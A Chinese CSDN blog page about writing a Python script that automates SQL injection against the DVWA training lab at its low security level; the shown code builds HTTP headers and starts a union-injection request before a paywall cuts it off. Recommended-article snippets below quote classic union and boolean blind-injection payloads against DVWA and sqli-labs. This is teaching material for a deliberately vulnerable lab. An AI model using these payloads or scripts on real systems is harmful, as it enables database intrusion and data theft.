基于dvwa的自动化sql注入脚本

最新推荐文章于 2024-02-03 20:52:01 发布
最新推荐文章于 2024-02-03 20:52:01 发布
阅读量443 收藏 7
点赞数
文章标签: mysql python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/altersueyunsheng/article/details/117291984
版权

SQL注入

概念等就不做介绍了,前人之述备矣。
本代码仅完成了get方式的注入,只针对了dvwa靶场中sql注入和盲注low部分的自动注入。(为了完成课程实验,因为dvwa里low级别注入方式是字符型的注入方式,因此我也减少了判断是数字注入还是字符注入,但要实现也容易,判断完类型后在构造sql语句中是否加“ ’ ”)
需要先构造http头部信息:

def get_header(url, cookie):  # 生成头部信息
    ip = re.search('\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}', url).group()
    headers = {
   
        'Host': f'{ip}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': f'{url}',
        'Connection': 'close',
        'Cookie': f'security=low; PHPSESSID={cookie}',
        'Upgrade-Insecure-Requests': '1'
    }
    return headers, ip

下面是各部分代码:

联合注入

根据构造注入的sql语句,url和头部信息,获取到页面,当页面出现Unknown时表示注入错误,当注入正确时会返回页面信息。

def sql_union_inject(sql, url, headers):
    str = f'?id={sql}&Submit=Submit#'
    printf("正在猜解:" + url + str)
    recv = requests.get(url + str, headers=headers).text
    if recv.find
最低0.47元/天 解锁文章
筱昀笙
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA布尔类型注入脚本
Bu2n的博客
12-01 536
DVWA布尔类型注入脚本 import requests from lxml import etree """ 前提 pip install requests pip install lxml 如果是爆破dvwa的话,只需要网站登录一下dvwa,记录一下cookie,改一下url,referer 如果不是则需要修改的参数有payload,xpath,结果内容 该脚本只测试过low级别 """ url = 'http://192.168.159.132/dvwa/vulnerabilities/sqli
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
dvwa批量mysql注入脚本_【DVWASQL注入
weixin_33016287的博客
02-15 117
0x01 LowSQL Injection最简单的注入,没有任何过滤,常规语句注入即可:11'1'#1' union select 1,2 #0' union select database(),2 #0' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa'...
DVWA SQL-injection 附python脚本
weixin_30617561的博客
01-05 308
SQL-Injection low等级 首先我们将dvwa等级调到low 如图 接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果 接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2 ...
DVWASQL Injection(Blind)
谢公子的博客
08-05 2765
SQL Injection(Blind) SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。 手工盲注思路 手工盲注的过程,就像你与一个机器人聊天,...
DVWA-master.zip
11-20
这个项目由Digininja开发并维护,它包含了一系列常见Web应用程序的安全漏洞,如SQL注入、跨站脚本(XSS)、文件包含、命令注入等。通过学习和实践对DVWA的攻击,安全专家可以更好地理解这些漏洞的工作原理,并提升...
用Burp对DVWA重放爆破攻击文章的配套资源
05-26
对于DVWA,它设计了一系列的安全级别,每个级别都包含了不同类型的漏洞,例如SQL注入、XSS跨站脚本、CSRF跨站请求伪造等。重放爆破攻击通常针对的是认证或授权过程,例如密码重置功能、登录接口等。在DVWA中,我们...
PHP、Apache环境中部署DVWA(综合靶场)
01-08
DVWA(Damn Vulnerable Web Application)是一款专门为安全研究人员和Web开发者设计的开源靶场工具,它包含了多种常见的Web应用漏洞,如密码爆破、SQL注入、文件上传、文件包含、跨站脚本(XSS)和跨站请求伪造...
爆破dvwa网站中的的数据库
08-28
DVWA(Damn Vulnerable Web Application)是一个用于安全培训和测试的开源Web应用程序,它包含了各种常见的安全漏洞,如SQL注入、跨站脚本(XSS)、文件包含等。在这个场景中,我们将关注如何通过SQL注入攻击来爆破...
DVWA-SQL手工注入
2302_80164634的博客
02-03 1970
查完表名,查列名,语句是-1’ union select 1, group_concat(column_names) from information_schema.columns where table_name=’users’#如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。进行抓包,这里我的bp有了些问题,完了重下个,这里就引用一下一些查找的截屏。
DVWA 命令注入
qq_41326328的博客
03-12 1126
DVWA 命令注入 实验 首先我们探讨一下 什么叫命令注入,指的是利用没有验证过的恶意命令或代码,对网站或者服务器进行渗透攻击。 注入有很多种,并不仅仅是SQL注入。比如: 命令注入(Command injection) Eval注入(Eval injection) 客户端脚本攻击(Script insertion) 跨网站脚本攻击(Cross Site Scripting,XSS) SQL注入...
dvwa为例学习简单sql布尔盲注的详细脚本
Lethe's Blog
03-02 2549
0x01 前置知识 1.SQL注入SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 SQL盲注: 一般情况,执行SQL盲注,服务器不会直接返回具体的数据库错误or语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的盲注) 一般在页面上不会直接显示sql执行的结果 ...
DVWAsql盲注...
weixin_45378289的博客
07-02 168
sql盲注没有返回数据库内容,所以要猜。 先猜长度,再猜字符 1’and length(database())>1 # 1’ and ascii(substr(database(),1,1))>1 # …好久好久 直接使用sqlmap来注入
基于DVWA靶场的盲注脚本
altersueyunsheng的博客
05-28 443
基于DVWA的自动盲注脚本 本文针对的是dvwa盲注部分的low级别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔盲注 dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断,盲注 str = f'?id={sql}&am
web安全学习之基于dvwaSQL注入演练(low)
weixin_41657031的博客
07-15 403
SQL注入练习:基于DVWASQL注入演练(low) 1、设置 把安全等级先调整为low,让自己获得点信心。 2、测试和分析页面的功能 根据上面的提示,输入用户的id。然后我们输入之后,发现它返回了关于这个user的信息!这里我们输入了“1”。 它返回三行数据,一行是我们输入的用户ID。一行是用户名,另外一行是用户别名。同时,看一下浏览器的地址栏那里,发现url成这样了 这里有个id=1...
WEB手动漏洞挖掘-SQL盲注(DVWA实战)
含笑
05-20 6539
select * from table_name where id = ’ 1’ and 1=1– ’ 在盲注里至少要有一个正确的结果;否则不显示; 1'order by 5--+ 1'order by 3--+1'union select 1,2--+ 1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),
SQL注入-15】自动化注入案例—以sqli-labs-less9为例(利用sqlmap工具)
m0_64378913的博客
05-12 2491
目录1 前言[09:55:46] [INFO] testing connection to the target URL [09:55:46] [INFO] checking if the target is protected by some kind of WAF/IPS [09:55:46] [INFO] testing if the target URL content is stable [09:55:47] [INFO] target URL content is stable [09:55:4
【学习笔记】SQL盲注之dvwa平台的python自动化测试
Secur17y的博客
10-11 470
目的 理解SQL盲注的原理、方法、过程。利用不同数据库特有的函数进行探测,从而获取信息。 环境 系统:Kali Linux 2019(IP:10.10.10.128) 平台:OWASPBWA v0.94中的DVWA(IP:10.10.10.131) 界面 操作 现在想利用substr函数对数据库名进行猜解,将字符转化为ACSII值逐位比较。 语法 substr(strings,offset,le...
dvwa手工SQL注入
最新发布
06-26
DVWA(Damn Vulnerable Web Application)是一个非常流行的开源Web应用程序,专用于教育和演示安全漏洞,包括SQL注入。手动SQL注入是一种常见的攻击手段,当用户输入的数据被直接插入到SQL查询中,而没有适当的过滤或转义处理时,就会发生这种情况。 **SQL注入的手动过程大致如下:** 1. **识别注入点:**首先,你需要找到Web应用程序中的表单或其他用户输入的地方,这可能是可能导致SQL注入的地方。 2. **构造测试数据:**尝试构造一些SQL代码片段,如`' OR '1'='1`,目的是让数据库返回错误的信息,如果成功,说明存在注入可能。 3. **观察响应:**当你提交这些数据并查看服务器响应时,可能会看到异常、错误信息或数据泄露,这表明注入成功。 4. **逐步测试和利用:**根据响应调整你的注入payload,逐步执行更复杂的操作,比如读取敏感数据、修改数据库等。 **相关问题--:** 1. SQL注入的危害是什么? 2. 如何避免DVWA中的SQL注入? 3. 在实际开发中如何防止SQL注入

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值